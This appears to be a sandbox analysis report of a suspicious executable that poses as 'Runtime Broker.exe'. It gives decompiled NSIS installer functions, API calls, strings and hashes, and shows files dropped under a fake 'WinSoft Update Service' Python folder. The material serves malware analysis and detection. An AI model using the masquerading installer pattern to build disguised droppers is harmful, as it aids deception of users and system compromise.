Error launching installer, xrefs: 004030B8
soft, xrefs: 00403156
Inst, xrefs: 0040314D
Null, xrefs: 0040315F
C:\Users\user\Desktop, xrefs: 004030C3, 004030C8, 004030CE
C:\Users\user\AppData\Local\Temp\, xrefs: 00403072, 0040323B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004032BA
"C:\Users\user\Desktop\Runtime Broker.exe" , xrefs: 00403068

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Runtime Broker.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-254840119
Opcode ID: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
Instruction ID: 3c019e557a6e0d840000321a6ffc1a5a74fe8930866e2d2a4a5af375f72a0401
Opcode Fuzzy Hash: 8e4e929ec00d298773cd7711401fbd042d30ada64bab94f08e83dcc7a4259e6b
Instruction Fuzzy Hash: 9B71E431A00204ABDB20DF64DD85B5E3EBCAB18315F2045BBF901B72D2D7789E458B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406579, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00406579(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x42923c - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a2b8 + _t43 * 2;
				_t44 = 0x428200;
				_t110 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E00406579(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x428200;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040653C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406483(_t110,  *0x42a268);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004067EB(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a26c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a304;
						if( *0x42a304 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a264;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a268,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a268,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110);
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040640A( *0x42a2b8, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a2b8 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E00406579(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040653C(_a4, _t44);
			}

0x00406579
0x00406579
0x00406579
0x0040657f
0x00406584
0x00406595
0x00406595
0x0040659d
0x0040659e
0x0040659f
0x004065a0
0x004065a3
0x004065ab
0x004065ad
0x004065c6
0x004065c9
0x004065c9
0x004067c5
0x004067c5
0x004067cb
0x00000000
0x00000000
0x004065d9
0x004065df
0x00000000
0x00000000
0x004065e7
0x004065e8
0x004065ea
0x004065ee
0x004065f1
0x004067b2
0x004067c0
0x004067c3
0x004067c3
0x004067b4
0x004067b7
0x004067ba
0x004067bc
0x004067bc
0x00000000
0x004067b2
0x004065f7
0x004065fa
0x00406609
0x00406610
0x0040661a
0x0040661e
0x00406621
0x00406624
0x00406629
0x0040662e
0x00406632
0x00406635
0x00406755
0x00406759
0x0040678c
0x00406790
0x00406795
0x0040679a
0x0040679a
0x0040679f
0x004067a0
0x004067a5
0x004067a8
0x004067ab
0x00000000
0x004067ab
0x0040675b
0x0040675e
0x00406761
0x00406776
0x0040677d
0x00406763
0x0040676a
0x0040676a
0x00406785
0x00406788
0x0040674d
0x0040674e
0x0040674e
0x00000000
0x00406788
0x0040663b
0x00406643
0x00406645
0x00406646
0x0040665f
0x0040665f
0x00406666
0x00406666
0x0040666d
0x00406671
0x00406671
0x00406672
0x00406674
0x004066af
0x004066b2
0x004066c2
0x004066c5
0x004066cd
0x004066d3
0x004066d3
0x00406730
0x00406730
0x00406732
0x00000000
0x00000000
0x004066d7
0x004066de
0x004066df
0x004066e1
0x004066fb
0x00406709
0x0040670f
0x00406711
0x0040672c
0x0040672c
0x0040672c
0x00000000
0x0040672c
0x00406717
0x00406722
0x00406728
0x0040672a
0x00000000
0x00000000
0x00000000
0x0040672a
0x004066e3
0x004066e6
0x00000000
0x00000000
0x004066f5
0x004066f7
0x004066f9
0x00000000
0x00000000
0x00000000
0x004066f9
0x00000000
0x00406730
0x004066ba
0x00000000
0x00406676
0x00406694
0x00406699
0x0040669d
0x0040673d
0x0040673d
0x00406740
0x00406748
0x00406748
0x00000000
0x00406740
0x004066a5
0x00406734
0x00406734
0x00406738
0x00000000
0x00000000
0x0040673a
0x00000000
0x0040673a
0x00406674
0x00406648
0x0040664d
0x00000000
0x00000000
0x0040664f
0x00406652
0x00000000
0x00000000
0x00406654
0x00406657
0x00000000
0x00406659
0x00406659
0x00000000
0x00406659
0x00406657
0x004067d1
0x004067dc
0x004067e8
0x004067e8
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(markers.py,00000400), ref: 004066BA
GetWindowsDirectoryW.KERNEL32(markers.py,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
SHGetPathFromIDListW.SHELL32(00000000,markers.py), ref: 00406717
CoTaskMemFree.OLE32(00000000), ref: 00406722
lstrcatW.KERNEL32(markers.py,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
lstrlenW.KERNEL32(markers.py,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040668A
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406742
markers.py, xrefs: 004065A3, 0040667E, 00406685, 00406689, 004066A3, 004066A4, 004066B9, 004066CC, 004066E8, 00406713, 00406747, 0040674D, 00406769, 0040677C, 00406799, 0040679F, 004067AB, 004067DE

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$markers.py
API String ID: 717251189-1455377006
Opcode ID: 38017e281cbdb7417c2012656fef4ee0337fe8851ede187b0d7372585b90f889
Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
Opcode Fuzzy Hash: 38017e281cbdb7417c2012656fef4ee0337fe8851ede187b0d7372585b90f889
Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402D3E(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E88( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\P";
				if(_t35 == 0) {
					lstrcatW(E00405E11(E0040653C(_t81, L"C:\\Program Files (x86)\\WinSoft Update Service\\Lib\\site-packages\\pip\\_vendor\\distlib")), ??);
				} else {
					E0040653C();
				}
				E004067EB(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040689A(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E0040600D(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406032(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004055A4(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a308;
						goto L32;
					} else {
						E0040653C(0x40b5f8, _t83);
						E0040653C(_t83, _t81);
						E00406579(_t77, _t81, _t83, "C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653C(_t83, 0x40b5f8);
						_t64 = E00405BA2("C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a308 =  &( *0x42a308->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004055A4();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004055A4(0xffffffea,  *(_t86 - 8));
				 *0x42a334 =  *0x42a334 + 1;
				_t45 = E00403309(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a334 =  *0x42a334 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406579(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406579(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405BA2();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402925
0x00402925
0x00402bc2
0x00402bc5
0x00402bc5
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402bcb
0x00402bcb
0x00402bcb
0x00401867
0x00401867
0x00401868
0x00401493
0x00402395
0x00402395
0x00402395
0x00401865
0x0040185e
0x00402bcd
0x00402bd1
0x00402bd1
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402390
0x00000000
0x00402390
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\markers.py,C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\markers.py,00000000,00000000,C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\markers.py,C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib,?,?,00000031), ref: 004017D5
GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 00401845

Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549

Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F

Strings

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib, xrefs: 00401835, 00401851
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\markers.py, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareEnvironmentFileFirmwareTextTimeVariableWindowlstrcpyn
String ID: C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib$C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib$C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\markers.py
API String ID: 2487204662-1472271122
Opcode ID: 3452185b9d4f0463ae55b512fcf801844792357ea77f8b518020cc9f2b2b9faa
Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
Opcode Fuzzy Hash: 3452185b9d4f0463ae55b512fcf801844792357ea77f8b518020cc9f2b2b9faa
Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403411, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403411(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x1a4c3ed
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a270 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402FC6(1);
					return 0;
				}
				E00403590( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x11bbf54
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E0040357A(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a274 != 0 &&  *0x42a320 == 0) {
						_t19 =  *0x420f00; // 0x66c7
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E00402FC6(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406AAC(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x413643
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x1a4c3ed
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E004060E4( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403414
0x00403421
0x00403434
0x00403439
0x00403569
0x0040356b
0x00000000
0x00403571
0x00403445
0x00403458
0x0040345e
0x00403464
0x0040346f
0x0040346f
0x00403474
0x00403479
0x00403481
0x00403483
0x00403483
0x0040348c
0x00403493
0x00000000
0x00000000
0x00403499
0x0040349f
0x004034a5
0x00000000
0x004034ab
0x004034b1
0x004034bb
0x004034d1
0x004034d6
0x004034db
0x004034e1
0x004034e7
0x004034f1
0x004034f8
0x00000000
0x00000000
0x004034fa
0x00403500
0x00403502
0x00403525
0x0040352b
0x00000000
0x00000000
0x0040352d
0x0040352f
0x00000000
0x00000000
0x00403531
0x00403531
0x00403544
0x00000000
0x00000000
0x00403553
0x00000000
0x00403553
0x0040350c
0x00403513
0x00403560
0x00403566
0x00403566
0x00000000
0x00403566
0x00403515
0x0040351b
0x00403521
0x00000000
0x00000000
0x00000000
0x00403564
0x00403564
0x00000000
0x00403564
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403425

Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
SetFilePointer.KERNELBASE(01A4C3ED,00000000,00000000,# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""",00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553

Strings

use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi, xrefs: 0040346A, 00403505
C6A, xrefs: 004034E1, 004034FA
# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508.""", xrefs: 00403485, 0040348B

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: use the underscore-lowercase style instead of hyphen-mixed case (i.e. home_page instead of Home-page). This is as per https://www.python.org/dev/peps/pep-0566/#id17. """ self.set_metadata_version() fields = _version2fi$# -*- coding: utf-8 -*-## Copyright (C) 2012-2017 Vinay Sajip.# Licensed to the Python Software Foundation under a contributor agreement.# See LICENSE.txt and CONTRIBUTORS.txt.#"""Parser for the environment markers micro-language defined in PEP 508."""$C6A
API String ID: 1092082344-2024662808
Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004068C1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004068C1(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068d8
0x004068e1
0x004068e3
0x004068e3
0x004068e7
0x004068fa
0x004068f4
0x004068f4
0x004068f4
0x00406913
0x00406927
0x0040692e

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
wsprintfW.USER32 ref: 00406913
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927

Strings

UXTHEME, xrefs: 004068CA
